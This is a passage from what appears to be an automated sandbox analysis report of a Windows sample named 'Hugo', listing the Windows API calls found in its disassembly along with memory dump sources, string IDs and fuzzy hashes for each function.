                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F721CC
                                                                                                                                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00F721D8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00F721E1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00F721E9
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00F721F2
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00F721F9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 146765662-0
                                                                                                                                                                                                              • Opcode ID: 5aec6b78a2e7015668f1d30bfe4b9f6dc279f14319d1e327aa9141ac956ad76b
                                                                                                                                                                                                              • Instruction ID: be7028fe957eaf0a077711b1617cfbffa4dedc4ec6340d1d83508d6689b5c36d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aec6b78a2e7015668f1d30bfe4b9f6dc279f14319d1e327aa9141ac956ad76b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05E09AB6104509BFEB011FA5EC0DD4ABF79FF4A722B504625F22682870CB329461EF51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F141EA: _wcslen.LIBCMT ref: 00F141EF
                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F7CF99
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F7CFE0
                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F7D047
                                                                                                                                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F7D075
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 1227352736-4108050209
                                                                                                                                                                                                              • Opcode ID: 91d4db5e01dbe36a83b851d3436164a7403dc99877bd77b53d6823296868be9d
                                                                                                                                                                                                              • Instruction ID: 6aa23ae46fe1cc0c16d6ffc78e584f8f832f85a9d4fbac4413fe7a41c452e4e0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91d4db5e01dbe36a83b851d3436164a7403dc99877bd77b53d6823296868be9d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B151E072A043009FD714AE28CC45BAFB7F8AF85324F448A2EF999D3191DB74C945A793
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00F9B903
                                                                                                                                                                                                                • Part of subcall function 00F141EA: _wcslen.LIBCMT ref: 00F141EF
                                                                                                                                                                                                              • GetProcessId.KERNEL32(00000000), ref: 00F9B998
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00F9B9C7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                              • String ID: <$@
                                                                                                                                                                                                              • API String ID: 146682121-1426351568
                                                                                                                                                                                                              • Opcode ID: bf9df756c22046cada9880ada31d94ce6f52763708d73954779d8e82181fd8d7
                                                                                                                                                                                                              • Instruction ID: db7ef4d1cf1cb7874aecf5fac03df693cca4a61f26f34eae9c70f8bf9fa117cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf9df756c22046cada9880ada31d94ce6f52763708d73954779d8e82181fd8d7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F716775A00219DFDF10EF94D995A9EBBF4BF08310F048499E856AB251CB74AD82DB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F77B6D
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F77BA3
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F77BB4
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F77C36
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                              • String ID: DllGetClassObject
                                                                                                                                                                                                              • API String ID: 753597075-1075368562
                                                                                                                                                                                                              • Opcode ID: f3f76bc280e4ac64783b31ae0ee05646786bf5eb652c82e285436913baf629e9
                                                                                                                                                                                                              • Instruction ID: 8bea2599f4a74d2fc9145397bc7c4a678c4087e7b503a9e9ac1a91d01677b7f1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3f76bc280e4ac64783b31ae0ee05646786bf5eb652c82e285436913baf629e9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 214190B1614304DFDB16EF24C884A9A7BB9EF48314B14C0AAED0ADF245D7B0D940EBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FA48D1
                                                                                                                                                                                                              • IsMenu.USER32(?), ref: 00FA48E6
                                                                                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FA492E
                                                                                                                                                                                                              • DrawMenuBar.USER32 ref: 00FA4941
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 3076010158-4108050209
                                                                                                                                                                                                              • Opcode ID: 03c92efb58d3d22238c27b1c7dc5acd9945a3f4589a74f0c0da17a4dd16fbebd
                                                                                                                                                                                                              • Instruction ID: e27e9afe172d6b00eb962f3bffe4045fc82ff94369bcb5456e724b4cf7e20f29
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03c92efb58d3d22238c27b1c7dc5acd9945a3f4589a74f0c0da17a4dd16fbebd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C44189B5A00209EFDB10CF51D884EABBBB9FF4A324F044029E946AB250D770ED50EF60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                                • Part of subcall function 00F745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F74620
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F727B3
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F727C6
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F727F6
                                                                                                                                                                                                                • Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                              • API String ID: 2081771294-1403004172
                                                                                                                                                                                                              • Opcode ID: 009fb232e50712f98c959e55923d96580c3177c365b55cc69e5d8e41959b8e29
                                                                                                                                                                                                              • Instruction ID: 4363eb312d83649044f993e07453d95dfbb838762fa2408f74bc6d389e6909ba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 009fb232e50712f98c959e55923d96580c3177c365b55cc69e5d8e41959b8e29
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23210772900104BFDB09AB64DC46DFE77B8DF453A0F14812BF426971E1CB39494AF652
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00FA3A29
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00FA3A30
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00FA3A45
                                                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00FA3A4D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                              • String ID: SysAnimate32
                                                                                                                                                                                                              • API String ID: 3529120543-1011021900
                                                                                                                                                                                                              • Opcode ID: b4dafc30a4edeca899495c11aeeeed3765e6d0d439aedf8ff5bfd202cbd07b3a
                                                                                                                                                                                                              • Instruction ID: cc96b17594b7e9237ab4dfa191a64bede2cdc15593ff3c52c2523bab65f9201d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4dafc30a4edeca899495c11aeeeed3765e6d0d439aedf8ff5bfd202cbd07b3a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F219AB5A00219AFEF109F64DC80FAB77AEEB4B374F105218FA91961A0D775CD81B760
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F3508E,?,?,00F3502E,?,00FD98D8,0000000C,00F35185,?,00000002), ref: 00F350FD
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F35110
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00F3508E,?,?,00F3502E,?,00FD98D8,0000000C,00F35185,?,00000002,00000000), ref: 00F35133
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                              • Opcode ID: 1c90b1e493486153d135f320de83ca21bfd72b9ce79a18a15f196967a47c1e43
                                                                                                                                                                                                              • Instruction ID: 9539a9f1a0d22bd2540fe62305543d98281751054ae68275c9d2bdfbc157b881
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c90b1e493486153d135f320de83ca21bfd72b9ce79a18a15f196967a47c1e43
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9F0C234A0020CBFDB10AF94DC19BEDBFB8EF44B26F000065F806A2160CF749E40EA91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F1668B,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F1664A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F1665C
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00F1668B,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F1666E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                              • API String ID: 145871493-3689287502
                                                                                                                                                                                                              • Opcode ID: a2cec29c179a913fbb3956c2af8864e0b1090243031a3c024054d4ed0fab6188
                                                                                                                                                                                                              • Instruction ID: ca45844b4157f3e78bbadd7d7d6692caa21b17fff8d6d2a697e27ec3b77b4536
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2cec29c179a913fbb3956c2af8864e0b1090243031a3c024054d4ed0fab6188
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EE0CD75A0252217A2111725BC0CBDE75299F83F3AB090215FC01D6210DF60CD41A4E5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F55657,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F16610
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F16622
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00F55657,?,?,00F162FA,?,00000001,?,?,00000000), ref: 00F16635
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                              • API String ID: 145871493-1355242751
                                                                                                                                                                                                              • Opcode ID: 2424e0b99a2e101085e45ef630b2d32d5da0a39872cae7afdb9b8755c5e3a184
                                                                                                                                                                                                              • Instruction ID: 92f962c375d68626a208ad71affbe7177c824600db047a55f8b8ba6080a72c1f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2424e0b99a2e101085e45ef630b2d32d5da0a39872cae7afdb9b8755c5e3a184
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BD05B75A1253557523227257C18ACF7B15DFD3F353090115F806E6524CF60CD41F5D9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F835C4
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00F83646
                                                                                                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F8365C
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F8366D
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F8367F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Delete$Copy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3226157194-0
                                                                                                                                                                                                              • Opcode ID: 219cf0bcaf2fffa7ea661c5dd0453d0f44fa52809a27673934eba4819ed4246c
                                                                                                                                                                                                              • Instruction ID: 17035614e22d185bc3a4bfb7e678a309b0d544b45c596c3cceaf720cfffea8a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 219cf0bcaf2fffa7ea661c5dd0453d0f44fa52809a27673934eba4819ed4246c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0B15E72E00119ABDF11EBA4CC85EDEBBBDEF49710F0040A6F509E7151EA34AB44EB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00F9AE87
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F9AE95
                                                                                                                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F9AEC8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00F9B09D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3488606520-0
                                                                                                                                                                                                              • Opcode ID: 6feba908422b4f2c7ef7fe47938ee2c6b1137fc3948f303b1d888d6e8a41cb04
                                                                                                                                                                                                              • Instruction ID: 72c773a46523ea4104cdf0881a2284ca105e6299c33f0544d8b2dd4278b648ca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6feba908422b4f2c7ef7fe47938ee2c6b1137fc3948f303b1d888d6e8a41cb04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFA1C271A043019FE720DF24D886F6AB7E1AF84720F54885CF9999B392CB75EC41DB81
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9C10E,?,?), ref: 00F9D415
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D451
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4C8
                                                                                                                                                                                                                • Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4FE
                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9C505
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F9C560
                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F9C5C3
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00F9C606
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F9C613
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
